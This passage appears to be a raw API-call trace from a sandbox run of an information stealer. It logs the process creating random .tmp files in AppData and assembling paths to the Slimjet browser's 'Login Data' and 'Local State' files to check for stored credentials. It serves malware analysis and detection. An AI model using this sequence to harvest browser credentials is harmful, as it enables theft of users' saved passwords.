7 [0203.462] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.462] lstrlenW (lpString=".plCyBz") returned 7 [0203.463] lstrcpyW (in: lpString1=0x2df0000, lpString2=".plCyBz" | out: lpString1=".plCyBz") returned=".plCyBz" [0203.463] lstrlenW (lpString=".plCyBz") returned 7 [0203.463] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.463] lstrcpyW (in: lpString1=0x2e20000, lpString2=".plCyBz" | out: lpString1=".plCyBz") returned=".plCyBz" [0203.463] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.463] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.463] lstrlenW (lpString=".plCyBz") returned 7 [0203.463] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.464] lstrcatW (in: lpString1="", lpString2=".plCyBz" | out: lpString1=".plCyBz") returned=".plCyBz" [0203.464] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.464] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.464] GetProcessHeap () returned 0x900000 [0203.464] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.464] lstrlenW (lpString=".plCyBz") returned 7 [0203.464] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.464] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.464] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.464] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.465] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2=".plCyBz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz" [0203.465] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.465] lstrlenW (lpString=".tmp") returned 4 [0203.465] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.465] lstrlenW (lpString=".tmp") returned 4 [0203.465] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.465] lstrlenW (lpString=".tmp") returned 4 [0203.465] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz") returned 53 [0203.465] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.465] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.466] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.466] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\.plCyBz.tmp" [0203.466] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.466] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.466] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.466] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.466] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.466] lstrlenW (lpString="\\") returned 1 [0203.466] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.467] lstrlenW (lpString="\\") returned 1 [0203.467] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.467] lstrlenW (lpString="\\") returned 1 [0203.467] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.467] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.467] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.467] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.467] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.467] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.468] GetProcessHeap () returned 0x900000 [0203.468] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.468] lstrlenA (lpString="x.fiDq.") returned 7 [0203.468] lstrlenA (lpString="x.fiDq.") returned 7 [0203.468] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.468] lstrcpyA (in: lpString1=0x2d80000, lpString2="x.fiDq." | out: lpString1="x.fiDq.") returned="x.fiDq." [0203.468] lstrlenA (lpString="x.fiDq.") returned 7 [0203.468] lstrlenA (lpString="x.fiDq.") returned 7 [0203.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.468] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.468] lstrlenA (lpString="x.fiDq.") returned 7 [0203.468] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="x.fiDq.") returned 8 [0203.468] lstrlenW (lpString="x.fiDq.") returned 7 [0203.468] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.469] lstrlenW (lpString="x.fiDq.") returned 7 [0203.469] lstrcpyW (in: lpString1=0x2e20000, lpString2="x.fiDq." | out: lpString1="x.fiDq.") returned="x.fiDq." [0203.469] lstrlenW (lpString="x.fiDq.") returned 7 [0203.469] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.469] lstrcpyW (in: lpString1=0x2eb0000, lpString2="x.fiDq." | out: lpString1="x.fiDq.") returned="x.fiDq." [0203.469] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.469] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.470] lstrlenW (lpString="x.fiDq.") returned 7 [0203.470] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.470] lstrcatW (in: lpString1="", lpString2="x.fiDq." | out: lpString1="x.fiDq.") returned="x.fiDq." [0203.470] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.470] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.470] GetProcessHeap () returned 0x900000 [0203.470] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.470] lstrlenW (lpString="x.fiDq.") returned 7 [0203.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.470] VirtualQuery (in: lpAddress=0x2df0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2df0000, AllocationBase=0x2df0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.470] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.471] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="x.fiDq." | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq.") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq." [0203.471] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.471] lstrlenW (lpString=".tmp") returned 4 [0203.471] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.472] lstrlenW (lpString=".tmp") returned 4 [0203.472] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.472] lstrlenW (lpString=".tmp") returned 4 [0203.472] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq.") returned 53 [0203.472] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.472] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.472] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.472] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq.", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq..tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\x.fiDq..tmp" [0203.472] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.473] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.473] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.473] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.473] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.473] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.473] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.474] lstrlenW (lpString="\\Slimjet\\User Data\\Default\\Login Data") returned 37 [0203.474] VirtualAlloc (lpAddress=0x0, dwSize=0x4c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.474] lstrlenW (lpString="\\Slimjet\\User Data\\Default\\Login Data") returned 37 [0203.474] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Slimjet\\User Data\\Default\\Login Data" | out: lpString1="\\Slimjet\\User Data\\Default\\Login Data") returned="\\Slimjet\\User Data\\Default\\Login Data" [0203.474] lstrlenW (lpString="\\Slimjet\\User Data\\Default\\Login Data") returned 37 [0203.474] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.474] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.474] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.474] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.474] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Slimjet\\User Data\\Default\\Login Data" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Slimjet\\User Data\\Default\\Login Data") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Slimjet\\User Data\\Default\\Login Data" [0203.475] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.475] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0203.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.475] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.475] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.475] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.475] lstrcpyW (in: lpString1=0x2dd0000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local" [0203.476] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.476] lstrlenW (lpString="\\Slimjet\\User Data\\Local State") returned 30 [0203.476] VirtualAlloc (lpAddress=0x0, dwSize=0x3e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.476] lstrlenW (lpString="\\Slimjet\\User Data\\Local State") returned 30 [0203.476] lstrcpyW (in: lpString1=0x2d80000, lpString2="\\Slimjet\\User Data\\Local State" | out: lpString1="\\Slimjet\\User Data\\Local State") returned="\\Slimjet\\User Data\\Local State" [0203.476] lstrlenW (lpString="\\Slimjet\\User Data\\Local State") returned 30 [0203.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 43 [0203.476] VirtualQuery (in: lpAddress=0x2dd0000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2dd0000, AllocationBase=0x2dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.476] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x2eb0000 [0203.476] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.477] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpString2="\\Slimjet\\User Data\\Local State" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Slimjet\\User Data\\Local State") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Slimjet\\User Data\\Local State" [0203.477] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.477] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Slimjet\\User Data\\Default\\Login Data") returned 0 [0203.477] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.477] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.478] VirtualFree (lpAddress=0x2eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.478] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.478] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.478] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.478] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.478] lstrlenW (lpString="\\") returned 1 [0203.478] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.479] lstrlenW (lpString="\\") returned 1 [0203.479] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.479] lstrlenW (lpString="\\") returned 1 [0203.479] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.479] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.479] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.479] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.479] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.480] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.480] GetProcessHeap () returned 0x900000 [0203.480] RtlAllocateHeap (HeapHandle=0x900000, Flags=0x0, Size=0x8) returned 0x934878 [0203.480] lstrlenA (lpString="yA.Glxm") returned 7 [0203.480] lstrlenA (lpString="yA.Glxm") returned 7 [0203.480] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.480] lstrcpyA (in: lpString1=0x2d80000, lpString2="yA.Glxm" | out: lpString1="yA.Glxm") returned="yA.Glxm" [0203.480] lstrlenA (lpString="yA.Glxm") returned 7 [0203.480] lstrlenA (lpString="yA.Glxm") returned 7 [0203.480] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x2, lpMultiByteStr=0x2d80000, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0203.480] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.481] lstrlenA (lpString="yA.Glxm") returned 7 [0203.481] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2d80000, cbMultiByte=-1, lpWideCharStr=0x2dd0000, cchWideChar=18 | out: lpWideCharStr="yA.Glxm") returned 8 [0203.481] lstrlenW (lpString="yA.Glxm") returned 7 [0203.481] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.481] lstrlenW (lpString="yA.Glxm") returned 7 [0203.481] lstrcpyW (in: lpString1=0x2df0000, lpString2="yA.Glxm" | out: lpString1="yA.Glxm") returned="yA.Glxm" [0203.481] lstrlenW (lpString="yA.Glxm") returned 7 [0203.481] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2e20000 [0203.481] lstrcpyW (in: lpString1=0x2e20000, lpString2="yA.Glxm" | out: lpString1="yA.Glxm") returned="yA.Glxm" [0203.481] VirtualFree (lpAddress=0x2df0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.482] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.482] lstrlenW (lpString="yA.Glxm") returned 7 [0203.482] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.482] lstrcatW (in: lpString1="", lpString2="yA.Glxm" | out: lpString1="yA.Glxm") returned="yA.Glxm" [0203.482] VirtualFree (lpAddress=0x2e20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.482] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.483] GetProcessHeap () returned 0x900000 [0203.483] HeapFree (in: hHeap=0x900000, dwFlags=0x0, lpMem=0x934878 | out: hHeap=0x900000) returned 1 [0203.483] lstrlenW (lpString="yA.Glxm") returned 7 [0203.483] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0203.483] VirtualQuery (in: lpAddress=0x2de0000, lpBuffer=0x415f9cc, dwLength=0x1c | out: lpBuffer=0x415f9cc*(BaseAddress=0x2de0000, AllocationBase=0x2de0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.483] VirtualAlloc (lpAddress=0x0, dwSize=0x6e, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.483] VirtualFree (lpAddress=0x2de0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.483] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="yA.Glxm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm" [0203.483] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.484] lstrlenW (lpString=".tmp") returned 4 [0203.484] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.484] lstrlenW (lpString=".tmp") returned 4 [0203.484] lstrcpyW (in: lpString1=0x2dd0000, lpString2=".tmp" | out: lpString1=".tmp") returned=".tmp" [0203.484] lstrlenW (lpString=".tmp") returned 4 [0203.484] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm") returned 53 [0203.484] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.484] VirtualAlloc (lpAddress=0x0, dwSize=0x76, flAllocationType=0x3000, flProtect=0x4) returned 0x2de0000 [0203.484] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.485] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm", lpString2=".tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\yA.Glxm.tmp" [0203.485] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.485] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x415f810, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 1 [0203.485] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.485] VirtualAlloc (lpAddress=0x0, dwSize=0x5c, flAllocationType=0x3000, flProtect=0x4) returned 0x2d80000 [0203.485] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.485] lstrcpyW (in: lpString1=0x2d80000, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming" [0203.485] lstrlenW (lpString="\\") returned 1 [0203.485] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x2dd0000 [0203.486] lstrlenW (lpString="\\") returned 1 [0203.486] lstrcpyW (in: lpString1=0x2dd0000, lpString2="\\" | out: lpString1="\\") returned="\\" [0203.486] lstrlenW (lpString="\\") returned 1 [0203.486] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 45 [0203.486] VirtualQuery (in: lpAddress=0x2d80000, lpBuffer=0x415f9bc, dwLength=0x1c | out: lpBuffer=0x415f9bc*(BaseAddress=0x2d80000, AllocationBase=0x2d80000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0203.486] VirtualAlloc (lpAddress=0x0, dwSize=0x60, flAllocationType=0x3000, flProtect=0x4) returned 0x2df0000 [0203.486] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.486] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0203.486] VirtualFree (lpAddress=0x2dd0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.487] GetProcessHeap 